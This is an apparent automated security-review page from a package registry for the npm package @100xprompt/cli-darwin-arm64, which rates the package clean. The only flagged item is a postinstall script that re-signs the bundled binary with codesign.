registry  /  @100xprompt/cli-darwin-arm64  /  0.1.2

@100xprompt/cli-darwin-arm64@0.1.2

AI Security Review

scanned 15h ago · by lpm-firewall-ai

No confirmed malicious attack surface from static inspection. The install hook only re-signs the packaged binary; broader process spawning, network, auth, and plugin behavior appears runtime/user-invoked and package-aligned.

Static reason
One or more suspicious static signals were detected.
Trigger
npm postinstall or user-invoked CLI runtime
Impact
No confirmed unauthorized persistence, exfiltration, or agent control hijack
Mechanism
native CLI binary with codesign postinstall
Rationale
Static inspection confirms the flagged lifecycle script is limited to local codesigning of the shipped binary, while risky primitives in source maps are part of an AI CLI runtime and not install-time or unconsented foreign control-surface mutation. I found no concrete malicious behavior sufficient to block or warn.
Evidence
package.jsonbin/100xpromptbin/index.js.mapbin/parser.worker.js.mapbin/worker.js.map./bin/100xpromptGlobal.Path.data/auth.jsonGlobal.Path.data/pluginsGlobal.Path.data/swarm

Decision evidence

public snapshot
AI called this Clean at 82.0% confidence as Benign with low false-positive risk.
Evidence for block
  • package.json has postinstall lifecycle script
  • bin/100xprompt is a Mach-O arm64 native executable
  • source map includes user-invoked spawning/swarm features
Evidence against
  • postinstall only runs codesign on ./bin/100xprompt and ignores failures
  • no install-time writes to home/project AI-agent control surfaces found
  • source maps show config/plugin writes under 100xprompt-owned paths
  • network use appears package-aligned: update/model/plugin/CLI APIs
  • no credential harvesting or exfiltration path confirmed
Behavioral surface
SourceNo risky source behavior triggered.
Supply chainNo supply-chain packaging signals triggered.
Manifest
NoLicense
scanned 0 file(s), 0 B of source

Source & flagged code

3 flagged · loading source
package.jsonView file
scripts.postinstall = codesign --remove-signature ./bin/100xprompt || true; codesign --sign - --force --preserve-metadata=entitlements,requirements,flags,runtime ./bin/100xprompt || true
High
Install Time Lifecycle Scripts

Package defines install-time lifecycle scripts.

package.jsonView on unpkg
scripts.postinstall = codesign --remove-signature ./bin/100xprompt || true; codesign --sign - --force --preserve-metadata=entitlements,requirements,flags,runtime ./bin/100xprompt || true
Medium
Ambiguous Install Lifecycle Script

Install-time lifecycle script is not statically allowlisted and needs review.

package.jsonView on unpkg
bin/100xpromptView file
path = bin/100xprompt kind = native_binary sizeBytes = 113187520 magicHex = [redacted]
Medium
Ships Native Binary

Package ships native binary artifacts.

bin/100xpromptView on unpkg

Findings

1 High2 Medium2 Low
HighInstall Time Lifecycle Scriptspackage.json
MediumAmbiguous Install Lifecycle Scriptpackage.json
MediumShips Native Binarybin/100xprompt
LowScripts Present
LowNo License